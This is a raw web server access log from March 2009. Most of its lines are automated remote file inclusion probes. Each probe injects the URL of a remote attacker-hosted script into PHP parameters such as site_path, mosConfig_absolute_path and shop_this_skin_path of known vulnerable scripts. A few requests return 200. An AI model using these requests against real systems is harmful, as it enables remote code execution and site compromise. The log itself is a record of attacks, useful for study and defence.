83.64.132.254 - - [22/Mar/2009:04:32:01 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
83.64.132.254 - - [22/Mar/2009:04:32:01 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.64.132.254 - - [22/Mar/2009:04:34:20 -0500] "GET /logs/access_log.1234137600//include/bbs.lib.inc.php?site_path=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
203.114.112.155 - - [22/Mar/2009:04:39:52 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://kih0119k.realmind.net/bbs/data2/balloon/fx.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
203.114.112.155 - - [22/Mar/2009:04:39:52 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://kih0119k.realmind.net/bbs/data2/balloon/fx.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
203.114.112.155 - - [22/Mar/2009:04:39:57 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://kih0119k.realmind.net/bbs/data2/balloon/fx.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.64.34.249 - - [22/Mar/2009:04:40:11 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.64.34.249 - - [22/Mar/2009:04:40:11 -0500] "GET /skin/zero_vote/error.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
69.64.34.249 - - [22/Mar/2009:04:43:16 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:04:43:16 -0500] "GET /skin/zero_vote/error.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:04:43:16 -0500] "GET /logs/skin/zero_vote/error.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
69.64.34.249 - - [22/Mar/2009:04:43:16 -0500] "GET /skin/zero_vote/error.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.207.240.235 - - [22/Mar/2009:04:46:51 -0500] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://www.google.fr/search?hl=fr&q=creteil&btnG=Recherche+Google&meta=""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
208.76.222.178 - - [22/Mar/2009:04:47:57 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
208.76.222.178 - - [22/Mar/2009:04:47:57 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.nis-network.org/joomla/cmd.do?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
173.10.217.18 - - [22/Mar/2009:05:09:37 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://nindi.moy.su/safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
173.10.217.18 - - [22/Mar/2009:05:09:38 -0500] "GET //components/com_flyspray/startdown.php?file=http://nindi.moy.su/safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.64.132.254 - - [22/Mar/2009:05:15:24 -0500] "GET /logs/access_log.1231459200/?_zb_path=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.64.132.254 - - [22/Mar/2009:05:15:24 -0500] "GET /logs/access_log.1231545600/?_zb_path=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.64.132.254 - - [22/Mar/2009:05:15:29 -0500] "GET /logs/?_zb_path=http://zargoon.misesajour.com/templates/id.txt???? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:20:50 -0500] "GET /logs/access_log.1235952000//components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:20:50 -0500] "GET //components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:20:53 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:21:18 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://nindi.moy.su/safe.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
173.10.217.18 - - [22/Mar/2009:05:21:19 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://nindi.moy.su/safe.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
173.10.217.18 - - [22/Mar/2009:05:21:22 -0500] "GET //components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:21:22 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:21:22 -0500] "GET /logs/access_log.1235952000//components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:21:28 -0500] "GET /logs/access_log.1235865600//components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:21:58 -0500] "GET /logs/access_log.1235865600//components/com_flyspray/startdown.php?file=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:28:54 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:28:59 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
173.10.217.18 - - [22/Mar/2009:05:28:59 -0500] "GET /logs/access_log.1235174400//admin/spaw/spaw_control.class.php?spaw_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
64.118.84.7 - - [22/Mar/2009:05:30:32 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crm.design-joomla.pl/classes/test.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
64.118.84.7 - - [22/Mar/2009:05:30:32 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://crm.design-joomla.pl/classes/test.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
81.69.176.185 - - [22/Mar/2009:05:59:55 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
81.69.176.185 - - [22/Mar/2009:05:59:56 -0500] "GET //skin/zero_vote/error.php?dir=http://members.mywave.at/m206111aa/cms/administrator/components/com_mkpostman/includes/v4id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
62.193.225.191 - - [22/Mar/2009:06:08:23 -0500] "GET /logs//testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:06:08:23 -0500] "GET /logs//testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:06:08:23 -0500] "GET //testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:06:08:24 -0500] "GET //testheaderpage.php?rootSys=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
64.34.177.190 - - [22/Mar/2009:06:09:15 -0500] "GET /logs//testheaderpage.php?rootSys=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:06:09:15 -0500] "GET //testheaderpage.php?rootSys=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
62.193.225.191 - - [22/Mar/2009:06:09:39 -0500] "GET /logs//testheaderpage.php?rootSys=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
62.193.225.191 - - [22/Mar/2009:06:09:39 -0500] "GET //testheaderpage.php?rootSys=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
64.15.159.42 - - [22/Mar/2009:06:13:23 -0500] "GET /logs/access_log.1230422400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:13:23 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:13:23 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.34.177.190 - - [22/Mar/2009:06:14:40 -0500] "GET /logs//testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
64.34.177.190 - - [22/Mar/2009:06:14:40 -0500] "GET //testheaderpage.php?rootSys=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
64.15.159.42 - - [22/Mar/2009:06:15:50 -0500] "GET /logs/access_log.1230422400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:15:50 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:15:50 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:15:50 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:03 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:03 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:03 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:07 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:22 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.208.139 - - [22/Mar/2009:06:16:31 -0500] "GET /logs/access_log.1121385600 HTTP/1.1" 200 776 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.15.159.42 - - [22/Mar/2009:06:16:38 -0500] "GET /logs/access_log.1232755200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:38 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:38 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:16:42 -0500] "GET /logs/access_log.1230422400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:17:06 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:17:06 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:17:06 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:17:06 -0500] "GET /logs/access_log.1230422400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:18:59 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:18:59 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:18:59 -0500] "GET /logs/access_log.1230422400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:18:59 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:06:22:03 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:06:22:03 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:06:22:04 -0500] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [22/Mar/2009:06:22:13 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:24:11 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
87.230.21.133 - - [22/Mar/2009:06:27:54 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:06:27:55 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
218.38.55.195 - - [22/Mar/2009:06:34:03 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:06:34:03 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:06:34:03 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:06:34:17 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:06:34:17 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:06:34:17 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:06:34:41 -0500] "GET /logs/access_log.1227571200//include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
218.38.55.195 - - [22/Mar/2009:06:34:42 -0500] "GET /logs/access_log.1227571200//include/bbs.lib.inc.php?site_path=http://www.yihshen.com.tw/gmail/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:37:42 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:37:42 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:37:42 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
64.15.159.42 - - [22/Mar/2009:06:37:42 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.controller.ind.br/copyright[1].txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
201.232.54.48 - - [22/Mar/2009:06:40:55 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
201.232.54.48 - - [22/Mar/2009:06:40:55 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
201.232.54.48 - - [22/Mar/2009:06:40:55 -0500] "GET /logs/access_log.1233532800//modules/xfsection/modify.php?dir_module=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
201.232.54.48 - - [22/Mar/2009:06:43:55 -0500] "GET /logs/access_log.1233964800//modules/xfsection/modify.php?dir_module=http://www.haesung.hs.kr//upload/fx29id2.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
24.39.162.98 - - [22/Mar/2009:06:45:21 -0500] "GET /logs/accounts/inc/include.php?language=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
24.39.162.98 - - [22/Mar/2009:06:45:22 -0500] "GET /accounts/inc/include.php?language=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
213.229.60.50 - - [22/Mar/2009:06:47:22 -0500] "GET /logs/accounts/inc/include.php?language=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.63"
213.229.60.50 - - [22/Mar/2009:06:47:23 -0500] "GET /accounts/inc/include.php?language=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.63"
213.229.60.50 - - [22/Mar/2009:06:47:23 -0500] "GET /logs/accounts/inc/include.php?language=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.63"
213.229.60.50 - - [22/Mar/2009:06:47:24 -0500] "GET /accounts/inc/include.php?language=http://r0xx0l1n0.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.63"
65.55.208.138 - - [22/Mar/2009:06:51:40 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [22/Mar/2009:06:51:41 -0500] "GET /logs/access_log.1235952000 HTTP/1.1" 200 193437 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
189.17.228.34 - - [22/Mar/2009:07:03:06 -0500] "GET /logs/access_log.1158192000 HTTP/1.0" 200 978 "http://search.live.com/results.aspx?mkt=pt-brz&FORM=TOOLBR&q=66.249.65.241""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
189.17.228.34 - - [22/Mar/2009:07:03:07 -0500] "GET /favicon.ico HTTP/1.0" 404 282 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
209.172.33.230 - - [22/Mar/2009:07:08:34 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 337 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:07:08:34 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
87.230.21.133 - - [22/Mar/2009:07:10:16 -0500] "GET /logs/images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
87.230.21.133 - - [22/Mar/2009:07:10:17 -0500] "GET /images/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
209.172.33.230 - - [22/Mar/2009:07:10:32 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:07:10:32 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:07:10:32 -0500] "GET /logs/access_log.1232755200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:07:10:38 -0500] "GET /logs/access_log.1231286400/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:07:12:25 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:07:12:25 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:07:12:25 -0500] "GET /logs/access_log.1232755200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
203.251.81.216 - - [22/Mar/2009:07:12:25 -0500] "GET /logs/access_log.1231286400/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
209.172.33.230 - - [22/Mar/2009:07:14:05 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:07:14:05 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
216.246.99.99 - - [22/Mar/2009:07:16:20 -0500] "GET //?DOCUMENT_ROOT=http://bentahan.com.ph/backup/crutz.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
216.246.99.99 - - [22/Mar/2009:07:16:20 -0500] "GET /logs//?DOCUMENT_ROOT=http://bentahan.com.ph/backup/crutz.txt???? HTTP/1.1" 200 182577 "-""libwww-perl/5.810"
209.172.33.230 - - [22/Mar/2009:07:16:28 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
209.172.33.230 - - [22/Mar/2009:07:16:28 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
216.246.99.99 - - [22/Mar/2009:07:16:55 -0500] "GET //?DOCUMENT_ROOT=http://bentahan.com.ph/backup/crutz.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
216.246.99.99 - - [22/Mar/2009:07:16:55 -0500] "GET /logs//?DOCUMENT_ROOT=http://bentahan.com.ph/backup/crutz.txt???? HTTP/1.1" 200 182577 "-""libwww-perl/5.810"
209.172.33.230 - - [22/Mar/2009:07:18:02 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
